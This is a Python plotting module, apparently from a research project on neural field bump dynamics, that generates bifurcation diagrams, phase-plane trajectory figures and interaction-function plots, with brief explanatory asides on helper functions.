modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
for slc in unlink_wrap(modsolph):
ax3.plot(modsolph[slc],timearr[slc],ls='--',lw=2,color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print 'shifted oned_nonconst_vel_bump ana by ', shift, 'where dt=',dat.dt
ax3.set_aspect('auto')
ax3.set_xlim(-pi,pi)
ax3.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax3.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax3.set_xticklabels(x_label)
#ax3.set_yticklabels([])
plt.tight_layout()
return fig
def oned_pitchfork(g0=.1,g1=2.5,N=50):
"""
get figure for 1d pitchfork bifurcation
"""
fig = plt.figure(figsize=(5,3))
ax = fig.add_subplot(111)
ax.set_xlabel(r'$g$')
ax.set_ylabel('Bump Velocity')
glist = np.linspace(g0,g1,N)
an_arr_plus = np.zeros(N) # analytic speed
num_arr_plus = np.zeros(N) # numerical speed
an_arr_minus = np.zeros(N) # analytic speed
num_arr_minus = np.zeros(N) # numerical speed
num_arr_zero = np.zeros(N)
for i,g in enumerate(glist):
dat = oned_simple.SimDat(g=g,q=0,zshift=.1)
dat2 = oned_simple.SimDat(g=g,q=0,zshift=-.1)
dat3 = oned_simple.SimDat(g=g,q=0,zshift=0.)
dat.params()
an_arr_plus[i] = dat.c_theory_eqn
an_arr_minus[i] = -dat2.c_theory_eqn
num_arr_plus[i] = dat.c_num
num_arr_minus[i] = dat2.c_num
ax.plot(glist,num_arr_plus,lw=3,color='black')
ax.plot(glist,num_arr_minus,lw=3,color='black')
ax.plot(glist,an_arr_plus,lw=2,linestyle='--',color='gray')
#ax.scatter(glist,num_arr_plus,marker='x',s=80,color='black')
ax.plot(glist,an_arr_minus,lw=2,linestyle='--',color='gray')
#ax.scatter(glist,num_arr_minus,marker='x',s=80,color='black')
ax.plot(glist,np.zeros(N),lw=2,linestyle='--',color='gray')
ax.set_xlim(g0,g1)
return fig
def oned_hopf(g0=1,g1=3.5,N=50):
"""
Get limsup of simulation
https://stackoverflow.com/questions/35149843/running-max-limsup-in-numpy-what-optimization/35150222#35150222?newreg=d630fa97367849d39f64defea1386dd2
limsup code doesn't work as expected
"""
# get index of peaks., get values of peaks. take last value.
fig = plt.figure(figsize=(5,3))
ax = fig.add_subplot(111)
ax.set_xlabel(r'$g$')
ax.set_ylabel('Oscillation Amplitude')
glist = np.linspace(g0,g1,N)
amp_num_plus = np.zeros(N) # numerical amplitude
amp_ana_plus = np.zeros(N) # analytic amplitude
amp_num_minus = np.zeros(N) # numerical amplitude
amp_ana_minus = np.zeros(N) # analytic amplitude
for i,g in enumerate(glist):
dat = oned_simple.SimDat(g=g,q=1,zshift=.1,T=20000)
dat.params()
dat.plot('phase_angle')
#plt.show()
# get peak indices
#get amplitude of last 20% of data
N_num = len(dat.ph_angle)
N_ana = len(dat.solph[:,0])
amp_num_plus[i] = np.amax(dat.ph_angle[int(.8*N_num):])
amp_ana_plus[i] = np.amax(dat.solph[:,0][int(.8*N_ana):])
amp_num_minus[i] = np.amin(dat.ph_angle[int(.8*N_num):])
amp_ana_minus[i] = np.amin(dat.solph[:,0][int(.8*N_ana):])
"""
dsol_num = np.gradient(dat.ph_angle)
dsol_ana = np.gradient(dat.solph[:,0])
peak_idx_num = np.where(np.diff(np.sign(dsol_num)))[0][-1]
peak_idx_ana = np.where(np.diff(np.sign(dsol_ana)))[0][-1]
print peak_idx_num
print peak_idx_ana
# peak values. get last peak.
amp_num[i] = dat.ph_angle[peak_idx_num]
amp_ana[i] = dat.solph[:,0][peak_idx_ana]
"""
ax.plot(glist,amp_num_plus,lw=3,color='black')
ax.plot(glist,amp_num_minus,lw=3,color='black')
#ax.scatter(glist,num_arr_plus,marker='x',s=80,color='black')
ax.plot(glist,amp_ana_plus,lw=2,linestyle='--',color='gray')
ax.plot(glist,amp_ana_minus,lw=2,linestyle='--',color='gray')
ax.set_xlim(g0,g1)
return fig
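The amplitude extraction above (extrema over the last 20% of the trace, past transients) can be factored into a small helper; `tail_amplitude` is a hypothetical name for illustration:

```python
import numpy as np

def tail_amplitude(trace, frac=0.2):
    # extrema over the final `frac` of the signal, after transients decay
    tail = trace[int((1.0 - frac) * len(trace)):]
    return np.amax(tail), np.amin(tail)
```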
def oned_bifurcations():
"""
combined hopf and pitchfork figure functions from above
"""
fig = plt.figure(figsize=(10,4))
subtitle_shift = -.0
subtitle_shift_y = 1.05
g0=.1;g1=2.5;N=50
ax1 = fig.add_subplot(121)
ax1.set_title(r'\textbf{(a)}',x=subtitle_shift,y=subtitle_shift_y,fontsize=20)
ax1.set_xlabel(r'$g$')
ax1.set_ylabel('Bump Velocity')
glist = np.linspace(g0,g1,N)
an_arr_plus = np.zeros(N) # analytic speed
num_arr_plus = np.zeros(N) # numerical speed
an_arr_minus = np.zeros(N) # analytic speed
num_arr_minus = np.zeros(N) # numerical speed
num_arr_zero = np.zeros(N)
for i,g in enumerate(glist):
dat = oned_simple.SimDat(g=g,q=0,zshift=.1)
dat2 = oned_simple.SimDat(g=g,q=0,zshift=-.1)
dat3 = oned_simple.SimDat(g=g,q=0,zshift=0.)
dat.params()
an_arr_plus[i] = dat.c_theory_eqn
an_arr_minus[i] = -dat2.c_theory_eqn
num_arr_plus[i] = dat.c_num
num_arr_minus[i] = dat2.c_num
del dat,dat2,dat3
ax1.plot(glist,num_arr_plus,lw=3,color='black')
ax1.plot(glist,num_arr_minus,lw=3,color='black')
ax1.plot(glist,an_arr_plus,lw=2,linestyle='--',color='gray')
ax1.plot(glist,an_arr_minus,lw=2,linestyle='--',color='gray')
ax1.plot(glist,np.zeros(N),lw=2,linestyle='--',color='gray')
ax1.set_xlim(g0,g1)
g0=1;g1=3.5;N=50
ax = fig.add_subplot(122)
ax.set_title(r'\textbf{(b)}',x=subtitle_shift,y=subtitle_shift_y,fontsize=20)
ax.set_xlabel(r'$g$')
ax.set_ylabel('Oscillation Amplitude')
glist = np.linspace(g0,g1,N)
amp_num_plus = np.zeros(N) # numerical amplitude
amp_ana_plus = np.zeros(N) # analytic amplitude
amp_num_minus = np.zeros(N) # numerical amplitude
amp_ana_minus = np.zeros(N) # analytic amplitude
for i,g in enumerate(glist):
dat = oned_simple.SimDat(g=g,q=1,zshift=.1,T=20000)
dat.params()
dat.plot('phase_angle')
#plt.show()
# get peak indices
#get amplitude of last 20% of data
N_num = len(dat.ph_angle)
N_ana = len(dat.solph[:,0])
amp_num_plus[i] = np.amax(dat.ph_angle[int(.8*N_num):])
amp_ana_plus[i] = np.amax(dat.solph[:,0][int(.8*N_ana):])
amp_num_minus[i] = np.amin(dat.ph_angle[int(.8*N_num):])
amp_ana_minus[i] = np.amin(dat.solph[:,0][int(.8*N_ana):])
del dat
ax.plot(glist,amp_num_plus,lw=3,color='black')
ax.plot(glist,amp_num_minus,lw=3,color='black')
#ax.scatter(glist,num_arr_plus,marker='x',s=80,color='black')
ax.plot(glist,amp_ana_plus,lw=2,linestyle='--',color='gray')
ax.plot(glist,amp_ana_minus,lw=2,linestyle='--',color='gray')
ax.set_xlim(g0,g1)
return fig
def twod_full_fig(q=1,g=3.,zshift_angle=pi/4.,zshift_rad=.3,T=5000,factor=.5,increment=13):
"""
peak dynamics of full model
"""
print 'initial angle',zshift_angle,'initial rad',zshift_rad
# define the u-shifts before they are used in the z-shift computation
ushift1 = 0.
ushift2 = 0.
ishift1 = 0.
ishift2 = 0.
zshift1 = ushift1 - zshift_rad*np.cos(zshift_angle)
zshift2 = ushift2 - zshift_rad*np.sin(zshift_angle)
#zshift1 = ushift1+.5#-.1
#zshift2 = ushift2+1.#-.1
eps = .005
dat = twod.SimDat(q=q,g=g,T=T,zshift1=zshift1,zshift2=zshift2,ushift1=ushift1,ushift2=ushift2,eps=eps)
# remove initial transient portion of sim (fraction set by factor)
start_idx = int(dat.TN*factor)
total_idx = dat.TN - start_idx
fig = plt.figure(figsize=(5,5))
ax = fig.add_subplot(111)
arrow_idx_increment = total_idx/increment
back_idx = 2
for i in range(start_idx,dat.TN-1):
color = ((1.*total_idx - (i-start_idx))/total_idx)*.75
if i%arrow_idx_increment == 0:
ax.annotate("",
xy=(dat.th1[i], dat.th2[i]), xycoords='data',
xytext=(dat.th1[i-back_idx], dat.th2[i-back_idx]), textcoords='data',
size=22,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color=str(color)),
)
#print color
#ax.scatter(dat.th1[i],dat.th2[i],edgecolors='none',facecolors=str(color),s=(1-color)*30)
#colors = np.arange(75,0,len(dat.th1[1:-1]))
colors = np.linspace(.85,0.,len(dat.th1[start_idx:-1]))
cmap = plt.get_cmap('gray')
my_cmap = truncate_colormap(cmap,.0,.75)
#my_cmap.set_under('w')
size = (1-colors)*30
#ax.set_title('g='+str(g)+'; q='+str(q)+'; eps='+str(eps))
ax.scatter(dat.th1[start_idx:-1],dat.th2[start_idx:-1],edgecolors='none',c=colors,s=size,cmap=my_cmap)
ax.scatter(dat.th1[-1],dat.th2[-1],marker="*",color='black',s=200,facecolors='white')
ax.scatter(dat.th1[start_idx],dat.th2[start_idx],marker="o",color='black',s=50,facecolors='white')
ax.set_xlim(-pi,pi)
ax.set_ylim(-pi,pi)
ax.set_xlabel(r'$\theta_1$')
ax.set_ylabel(r'$\theta_2$')
ax.set_xticks(np.arange(-1,1+.5,.5)*pi)
ax.set_yticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
ax.set_xticklabels(x_label)
ax.set_yticklabels(x_label)
del dat
return fig
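`truncate_colormap`, used above and in the other trajectory figures, is assumed to be defined elsewhere in this module; a common implementation, which resamples a band of an existing colormap into a new one, looks like this:

```python
import numpy as np
import matplotlib
matplotlib.use('Agg')  # headless backend so this sketch runs without a display
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors

def truncate_colormap(cmap, minval=0.0, maxval=1.0, n=256):
    """Return a new colormap built from the [minval, maxval] band of `cmap`."""
    colors = cmap(np.linspace(minval, maxval, n))
    name = 'trunc({0},{1:.2f},{2:.2f})'.format(cmap.name, minval, maxval)
    return mcolors.LinearSegmentedColormap.from_list(name, colors)
```

Calling it as in the figures, `truncate_colormap(plt.get_cmap('gray'), .0, .75)`, yields a gray map that never reaches pure white, so the oldest trajectory points stay visible.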
def twod_phase_fig(q=1,g=4.2,T=104,factor=.71,increment=13,phase_option='approx'):
"""
peak dynamics of the phase model (full or approx)
"""
ph = twodp.Phase(q=q,x0=1,y0=.01,g=g,dde_T=T,phase_option=phase_option)
# remove initial transient portion of sim (fraction set by factor)
start_idx = int(ph.dde_TN*factor)
total_idx = ph.dde_TN - start_idx
arrow_idx_increment = total_idx/increment
back_idx = 1
fig = plt.figure(figsize=(5,5))
ax = fig.add_subplot(111)
th1 = np.mod(ph.th1+pi,2*pi)-pi
th2 = np.mod(ph.th2+pi,2*pi)-pi
for i in range(start_idx,ph.dde_TN-1):
color = ((1.*total_idx - (i-start_idx))/total_idx)*.75
if i%arrow_idx_increment == 0:
ax.annotate("",
xy=(th1[i], th2[i]), xycoords='data',
xytext=(th1[i-back_idx], th2[i-back_idx]), textcoords='data',
size=22,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color=str(color)),
)
#print color
#ax.scatter(ph.th1[i],ph.th2[i],edgecolors='none',facecolors=str(color),s=(1-color)*30)
# for speedup consider using http://stackoverflow.com/questions/17682216/scatter-plot-and-color-mapping-in-python
colors = np.linspace(.75,0.,len(ph.th1[start_idx:-1]))
cmap = plt.get_cmap('gray')
my_cmap = truncate_colormap(cmap,.0,.75)
size = (1-colors)*30
ax.scatter(th1[start_idx:-1],th2[start_idx:-1],edgecolors='none',c=colors,s=size,cmap=my_cmap)
ax.scatter(th1[-1],th2[-1],marker="*",color='black',s=200,facecolors='white')
ax.scatter(th1[start_idx],th2[start_idx],marker="o",color='black',s=50,facecolors='white')
ax.set_xlim(-pi,pi)
ax.set_ylim(-pi,pi)
ax.set_xlabel(r'$\theta_1$')
ax.set_ylabel(r'$\theta_2$')
ax.set_xticks(np.arange(-1,1+.5,.5)*pi)
ax.set_yticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
ax.set_xticklabels(x_label)
ax.set_yticklabels(x_label)
del ph
return fig
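The `np.mod(ph.th1+pi,2*pi)-pi` idiom above maps unwrapped phase trajectories onto the principal interval `[-pi,pi)` so they plot correctly on the periodic domain. As a standalone helper (the name `wrap_to_pi` is illustrative, not from this module):

```python
import numpy as np

def wrap_to_pi(theta):
    """Map angles (scalar or array) onto the interval [-pi, pi)."""
    return np.mod(theta + np.pi, 2 * np.pi) - np.pi
```

Note the convention at the endpoints: both `pi` and `-pi` map to `-pi`, which is harmless for plotting on a ring.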
def combined_phase_fig(option ="limit_cycle"):
"""
plot all three trajectories at once: 2D full, 2D phase (full), and 2D phase (approx).
"""
r0=1.;nu0=.01
ushift1=0.
ushift2=0.
zshift_rad=.8;zshift_angle=pi/3.5
zshift1=ushift1-zshift_rad*np.cos(zshift_angle);zshift2=ushift2-zshift_rad*np.sin(zshift_angle)
ishift1=0.;ishift2=0.
#zshift1 = ushift1+.4#-.1
#zshift2 = ushift2+1.#-.1
fig = plt.figure(figsize=(15,5))
cmap = plt.get_cmap('gray')
my_cmap = truncate_colormap(cmap,.0,.75)
if option == "const":
full_q=0;full_g=3;full_T=7000
full_factor=.4;full_increment=13
ph_full_q=0;ph_full_g=2.2;ph_full_dde_T=200
ph_full_factor=.9;ph_full_increment=12
ph_approx_q=0;ph_approx_g=3;ph_approx_dde_T=100
ph_approx_factor=.8;ph_approx_increment=13
elif option == "limit_cycle":
#(twod_full_fig, [2.,5.,5000,.84,13],['twod_full_fig_q=2_g=5.pdf']),
#(twod_phase_fig,[1.,4.,300,.0,20,'full'],['twod_phase_full_fig_test']),
#(twod_phase_fig,[1.,4.,110,.956,13,'approx'],['twod_phase_approx_fig_q=1_g=4.pdf']),
full_q=2;full_g=5;full_T=5000
full_factor=.84;full_increment=13
ph_full_q=1;ph_full_g=3.;ph_full_dde_T=110
ph_full_factor=.949;ph_full_increment=7
ph_approx_q=1;ph_approx_g=3;ph_approx_dde_T=110
ph_approx_factor=.953;ph_approx_increment=6
elif option == "non_const":
#(twod_full_fig, [1.,5.,5000,.45,13],['twod_full_fig_q=1_g=5.pdf']),
#(twod_phase_fig,[1.,5.,100,.85,5,'approx'],['twod_phase_approx_fig_q=1_g=5.pdf']),
#(twod_phase_fig,[1.,5.,100,.8,12,'full'],['twod_phase_full_fig_q=1_g=5.pdf']),
full_q=1;full_g=5;full_T=5000
full_factor=.45;full_increment=13
ph_full_q=1;ph_full_g=5.;ph_full_dde_T=100
ph_full_factor=.85;ph_full_increment=5
ph_approx_q=1;ph_approx_g=5;ph_approx_dde_T=100
ph_approx_factor=.8;ph_approx_increment=12
dat = twod.SimDat(q=full_q,g=full_g,T=full_T,zshift1=zshift1,zshift2=zshift2,ushift1=ushift1,ushift2=ushift2)
ph_full = twodp.Phase(q=ph_full_q,x0=r0,y0=nu0,g=ph_full_g,dde_T=ph_full_dde_T,phase_option='full')
ph_approx = twodp.Phase(q=ph_approx_q,x0=r0,y0=nu0,g=ph_approx_g,dde_T=ph_approx_dde_T,phase_option='approx')
subtitle_shift = -.0
subtitle_shift_y = 1.05
## Plot full
ax1 = fig.add_subplot(131)
ax1.set_title(r"\textbf{(a)}",x=subtitle_shift,y=subtitle_shift_y,fontsize=20)
# remove initial transient portion of sim (fraction set by full_factor)
start_idx = int(dat.TN*full_factor)
total_idx = dat.TN - start_idx
arrow_idx_increment = total_idx/full_increment
back_idx = 2
for i in range(start_idx,dat.TN-1):
color = ((1.*total_idx - (i-start_idx))/total_idx)*.75
if i%arrow_idx_increment == 0:
ax1.annotate("",
xy=(dat.th1[i], dat.th2[i]), xycoords='data',
xytext=(dat.th1[i-back_idx], dat.th2[i-back_idx]), textcoords='data',
size=22,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color=str(color)),
)
colors = np.linspace(.85,0.,len(dat.th1[start_idx:-1]))
#my_cmap.set_under('w')
size = (1-colors)*30
#ax.set_title('g='+str(g)+'; q='+str(q)+'; eps='+str(eps))
ax1.scatter(dat.th1[start_idx:-1],dat.th2[start_idx:-1],edgecolors='none',c=colors,s=size,cmap=my_cmap)
ax1.scatter(dat.th1[-1],dat.th2[-1],marker="*",color='black',s=200,facecolors='white')
ax1.scatter(dat.th1[start_idx],dat.th2[start_idx],marker="o",color='black',s=50,facecolors='white')
ax1.set_xlim(-pi,pi)
ax1.set_ylim(-pi,pi)
ax1.set_xlabel(r'$\theta_1$',fontsize=20)
ax1.set_ylabel(r'$\theta_2$',fontsize=20)
ax1.set_xticks(np.arange(-1,1+.5,.5)*pi)
ax1.set_yticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
ax1.set_xticklabels(x_label,fontsize=20)
ax1.set_yticklabels(x_label,fontsize=20)
## Plot phase full
ax2 = fig.add_subplot(132)
ax2.set_title(r"\textbf{(b)}",x=subtitle_shift,y=subtitle_shift_y,fontsize=20)
# remove initial transient portion of sim (fraction set by ph_full_factor)
start_idx = int(ph_full.dde_TN*ph_full_factor)
total_idx = ph_full.dde_TN - start_idx
arrow_idx_increment = total_idx/ph_full_increment
back_idx = 1
th1 = np.mod(ph_full.th1+pi,2*pi)-pi
th2 = np.mod(ph_full.th2+pi,2*pi)-pi
for i in range(start_idx,ph_full.dde_TN-1):
color = ((1.*total_idx - (i-start_idx))/total_idx)*.75
if i%arrow_idx_increment == 0:
ax2.annotate("",
xy=(th1[i], th2[i]), xycoords='data',
xytext=(th1[i-back_idx], th2[i-back_idx]), textcoords='data',
size=22,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color=str(color)),
)
# http://stackoverflow.com/questions/17682216/scatter-plot-and-color-mapping-in-python
colors = np.linspace(.75,0.,len(ph_full.th1[start_idx:-1]))
size = (1-colors)*30
ax2.scatter(th1[start_idx:-1],th2[start_idx:-1],edgecolors='none',c=colors,s=size,cmap=my_cmap)
ax2.scatter(th1[-1],th2[-1],marker="*",color='black',s=200,facecolors='white')
ax2.scatter(th1[start_idx],th2[start_idx],marker="o",color='black',s=50,facecolors='white')
ax2.set_xlim(-pi,pi)
ax2.set_ylim(-pi,pi)
ax2.set_xlabel(r'$\theta_1$',fontsize=20)
#ax2.set_ylabel(r'$\theta_2$')
ax2.set_xticks(np.arange(-1,1+.5,.5)*pi)
#ax.set_yticks([])
ax2.set_xticklabels(x_label,fontsize=20)
ax2.set_yticklabels([])
## Plot phase approx
ax3 = fig.add_subplot(133)
ax3.set_title(r"\textbf{(c)}",x=subtitle_shift,y=subtitle_shift_y,fontsize=20)
# remove initial transient portion of sim (fraction set by ph_approx_factor)
start_idx = int(ph_approx.dde_TN*ph_approx_factor)
total_idx = ph_approx.dde_TN - start_idx
arrow_idx_increment = total_idx/ph_approx_increment
back_idx = 1
th1 = np.mod(ph_approx.th1+pi,2*pi)-pi
th2 = np.mod(ph_approx.th2+pi,2*pi)-pi
for i in range(start_idx,ph_approx.dde_TN-1):
color = ((1.*total_idx - (i-start_idx))/total_idx)*.75
if i%arrow_idx_increment == 0:
ax3.annotate("",
xy=(th1[i], th2[i]), xycoords='data',
xytext=(th1[i-back_idx], th2[i-back_idx]), textcoords='data',
size=22,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color=str(color)),
)
# http://stackoverflow.com/questions/17682216/scatter-plot-and-color-mapping-in-python
colors = np.linspace(.75,0.,len(ph_approx.th1[start_idx:-1]))
size = (1-colors)*30
ax3.scatter(th1[start_idx:-1],th2[start_idx:-1],edgecolors='none',c=colors,s=size,cmap=my_cmap)
ax3.scatter(th1[-1],th2[-1],marker="*",color='black',s=200,facecolors='white')
ax3.scatter(th1[start_idx],th2[start_idx],marker="o",color='black',s=50,facecolors='white')
ax3.set_xlim(-pi,pi)
ax3.set_ylim(-pi,pi)
ax3.set_xlabel(r'$\theta_1$',fontsize=20)
#ax2.set_ylabel(r'$\theta_2$')
ax3.set_xticks(np.arange(-1,1+.5,.5)*pi)
#ax.set_yticks(np.arange(-1,1+.5,.5)*pi)
ax3.set_xticklabels(x_label,fontsize=20)
ax3.set_yticklabels([])
return fig
def HJ_i_fig():
"""
plot H_i in the first row and J_i in the second row
"""
dat = twodp.Phase(recompute_h=False,recompute_j=False)
H1,H2 = dat.H1,dat.H2
J1,J2 = dat.J1,dat.J2
fig = plt.figure(figsize=(10,10))
subtitle_shift = -.0
ax11 = fig.add_subplot(2,2,1,projection='3d')
ax11.set_title(r'\textbf{(a)}',x=subtitle_shift)
#ax11.set_title(r"$H_1$")
ax11 = twod.plot_s(ax11,H1)
ax11.set_zlabel(r'$H_1$')
ax12 = fig.add_subplot(2,2,2,projection='3d')
ax12.set_title(r'\textbf{(b)}',x=subtitle_shift)
#ax12.set_title(r"$H_2$")
ax12 = twod.plot_s(ax12,H2)
ax12.set_zlabel(r'$H_2$')
ax21 = fig.add_subplot(2,2,3,projection='3d')
ax21.set_title(r'\textbf{(c)}',x=subtitle_shift)
#ax21.set_title(r"$J_1$")
ax21 = twod.plot_s(ax21,J1)
ax21.set_zlabel(r'$J_1$')
ax22 = fig.add_subplot(2,2,4,projection='3d')
ax22.set_title(r'\textbf{(d)}',x=subtitle_shift)
#ax22.set_title(r"$J_2$")
ax22 = twod.plot_s(ax22,J2)
ax22.set_zlabel(r'$J_2$')
plt.tight_layout()
return fig
def HJ_fig():
"""
plot H in the first row and J in the second row
"""
dat = oned_simple.SteadyState()
#dat.plot('J')
#dat.plot('H')
#plt.show()
fig = plt.figure(figsize=(10,3))
subtitle_shift = -0.05
subtitle_shift_y = 1.1
ax11 = fig.add_subplot(1,2,1)
ax11.set_title(r'\textbf{(a)}',x=subtitle_shift,y=subtitle_shift_y,fontsize=20)
newdom = np.linspace(-pi,pi,dat.N)
ax11.plot(newdom,np.roll(dat.H_numerical,dat.N/2),color='black',lw=4,label='H')
ax11.plot(newdom,np.roll(dat.H(dat.domain),dat.N/2),color='#3399ff',ls='--',lw=3,label='H approx.')
ax11.tick_params(labelsize=15)
#plot.tick_params(axis='both', which='major', labelsize=10)
ax11.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
ax11.set_xticklabels(x_label,fontsize=15)
ax11.set_xlim(-pi,pi)
ax11.legend(loc=4)
ax12 = fig.add_subplot(1,2,2)
ax12.set_title(r'\textbf{(b)}',x=subtitle_shift,y=subtitle_shift_y,fontsize=20)
ax12.plot(newdom,np.roll(dat.J_numerical,dat.N/2),color='black',lw=4,label='J')
ax12.plot(newdom,np.roll(dat.J(dat.domain),dat.N/2),color='#3399ff',ls='--',lw=3,label='J approx.')
ax12.tick_params(labelsize=15)
ax12.set_xticks(np.arange(-1,1+.5,.5)*pi)
ax12.set_xticklabels(x_label,fontsize=15)
ax12.set_xlim(-pi,pi)
ax12.legend(loc=3)
plt.tight_layout()
return fig
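The `np.roll(...,dat.N/2)` calls above recenter functions computed on the periodic grid `[0,2*pi)` so they display on `[-pi,pi)`: shifting the array by half the grid moves the `x=0` sample to the middle of the new domain. A minimal illustration (grid size `N` is arbitrary here, and endpoint handling is simplified relative to the plotting code):

```python
import numpy as np

N = 8
x = np.linspace(0, 2 * np.pi, N, endpoint=False)       # original domain [0, 2*pi)
f = np.cos(x)                                          # peak at x = 0 (index 0)
newdom = np.linspace(-np.pi, np.pi, N, endpoint=False) # display domain [-pi, pi)
f_centered = np.roll(f, N // 2)                        # peak now sits at newdom = 0
```

After the roll, the peak of `cos` lands at index `N//2`, i.e. at the center of `newdom`.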
def H_approx_fig():
fig = plt.figure(figsize=(10,10))
subtitle_shift = -.0
dat = twodp.Phase()
h1_approx_p = dat.h1_approx_p(dat.XX,dat.YY)
h2_approx_p = dat.h2_approx_p(dat.XX,dat.YY)
dat2 = twodp.Phase(recompute_h=False,recompute_j=False)
H1 = dat2.H1
J1 = dat2.J1
ax11 = fig.add_subplot(2,2,1,projection='3d')
ax11 = twod.plot_s(ax11,h1_approx_p)
ax11.set_title(r'\textbf{(a)}',x=subtitle_shift)
ax11.set_zlabel(r'$\hat H_1$')
ax12 = fig.add_subplot(2,2,2,projection='3d')
ax12 = twod.plot_s(ax12,-h1_approx_p)
ax12.set_title(r'\textbf{(b)}',x=subtitle_shift)
ax12.set_zlabel(r'$\hat J_1$')
ax21 = fig.add_subplot(2,2,3,projection='3d')
ax21 = twod.plot_s(ax21,H1)
ax21.set_title(r'\textbf{(c)}',x=subtitle_shift)
ax21.set_zlabel(r'$H_1$')
ax22 = fig.add_subplot(2,2,4,projection='3d')
ax22 = twod.plot_s(ax22,J1)
ax22.set_title(r'\textbf{(d)}',x=subtitle_shift)
ax22.set_zlabel(r'$J_1$')
return fig
def H_approx_nullclines():
"""
plot level curves z=0; intersections denote the existence of limit cycles.
"""
ncx = np.loadtxt("nc_phase_approx_q=0.5_g=1.5_x_mesh=100.dat")
ncy = np.loadtxt("nc_phase_approx_q=0.5_g=1.5_y_mesh=100.dat")
#ncx = np.loadtxt("nc_phase_approx_q=1_g=3_x_mesh100.dat")
#ncy = np.loadtxt("nc_phase_approx_q=1_g=3_y_mesh100.dat")
fig = plt.figure(figsize=(10,5))
ax = fig.add_subplot(131)
#ncy[:,0] = np.sort(ncy[:,0])
#ncy[:,1] = ncy[:,1][np.argsort(ncy[:,0])]
ncy[ncy[:,1]>.85]=np.nan
#ncx,ncy = remove_redundant(ncx,ncy,tol=.01)
index_to_order_x_by = ncx[:,1].argsort()
index_to_order_y_by = ncy[:,0].argsort()
ncx_ordered = ncx[index_to_order_x_by]
ncy_ordered = ncy[index_to_order_y_by]
#ncx = np.loadtxt("nc_phase_approx_q=1_g=3_x_mesh100.dat")
#ncy = np.loadtxt("nc_phase_approx_q=1_g=3_y_mesh100.dat")
#ncy[:,0] = np.sort(ncy[:,0])
#ncy[:,1] = ncy[:,1][np.argsort(ncy[:,0])]
#ax2.scatter(ncx[:,0],ncx[:,1],edgecolor='none',facecolor='green',s=15)
#ax2.scatter(ncy[:,0],ncy[:,1],edgecolor='none',facecolor='blue',s=15)
#ax2.plot(ncy[:,0],ncy[:,1],color='blue')
ax.plot(ncx_ordered[:,0],ncx_ordered[:,1],color='green',lw=3)
ax.plot(ncy_ordered[:,0],ncy_ordered[:,1],color='blue',lw=3)
#ax.scatter(ncx[:,0],ncx[:,1],edgecolor='none',facecolor='green',s=15)
#ax.scatter(ncy[:,0],ncy[:,1],edgecolor='none',facecolor='blue',s=15)
ax.set_xlabel(r'$r$')
ax.set_ylabel(r'$\nu$')
ax.set_title(r'$g=1.501$')
# nullcline intersections (from XPP)
r1 = .021405
nu1 = .707
r2 = 1.7474
nu2 = .18074
ax.scatter(r1,nu1,edgecolor='black',facecolor='white',s=60)
ax.scatter(r2,nu2,edgecolor='black',facecolor='white',s=60)
ax.annotate(r'$r='+str(r1)+r'$ \\ $\nu='+str(nu1)+r'$', xy=(r1+.1, nu1), xycoords='data',
xytext=(40, 0), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc,angleA=0,armA=20,angleB=0,armB=15,rad=10"),
)
ax.annotate(r'$r='+str(r2)+r'$ \\ $\nu='+str(nu2)+r'$', xy=(r2-.02, nu2-.02), xycoords='data',
xytext=(-60, -40), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc,angleA=0,armA=20,angleB=-130,armB=15,rad=7"),
)
ax.set_xlim(0,2)
ax.set_ylim(0,1)
##### #PART 2
#ncx = np.loadtxt("nc_phase_approx_q=0.5_g=1.75_x_mesh=100.dat")
#ncy = np.loadtxt("nc_phase_approx_q=0.5_g=1.75_y_mesh=100.dat")
ncx = np.loadtxt("nc_phase_approx_q=0.5_g=2_x_mesh=100.dat")
ncy = np.loadtxt("nc_phase_approx_q=0.5_g=2_y_mesh=100.dat")
ncy[ncy[:,1]>.85]=np.nan
#ncx,ncy = remove_redundant(ncx,ncy,tol=.01)
index_to_order_x_by = ncx[:,1].argsort()
index_to_order_y_by = ncy[:,0].argsort()
ncx_ordered = ncx[index_to_order_x_by]
ncy_ordered = ncy[index_to_order_y_by]
#ncx = np.loadtxt("nc_phase_approx_q=1_g=3_x_mesh100.dat")
#ncy = np.loadtxt("nc_phase_approx_q=1_g=3_y_mesh100.dat")
ax2 = fig.add_subplot(132)
#ncy[:,0] = np.sort(ncy[:,0])
#ncy[:,1] = ncy[:,1][np.argsort(ncy[:,0])]
#ax2.scatter(ncx[:,0],ncx[:,1],edgecolor='none',facecolor='green',s=15)
#ax2.scatter(ncy[:,0],ncy[:,1],edgecolor='none',facecolor='blue',s=15)
#ax2.plot(ncy[:,0],ncy[:,1],color='blue')
ax2.plot(ncx_ordered[:,0],ncx_ordered[:,1],color='green',lw=3)
ax2.plot(ncy_ordered[:,0],ncy_ordered[:,1],color='blue',lw=3)
ax2.set_xlabel(r'$r$')
#ax2.set_ylabel(r'$\nu$')
ax2.set_title(r'$g=2$')
ax2.set_yticklabels([])
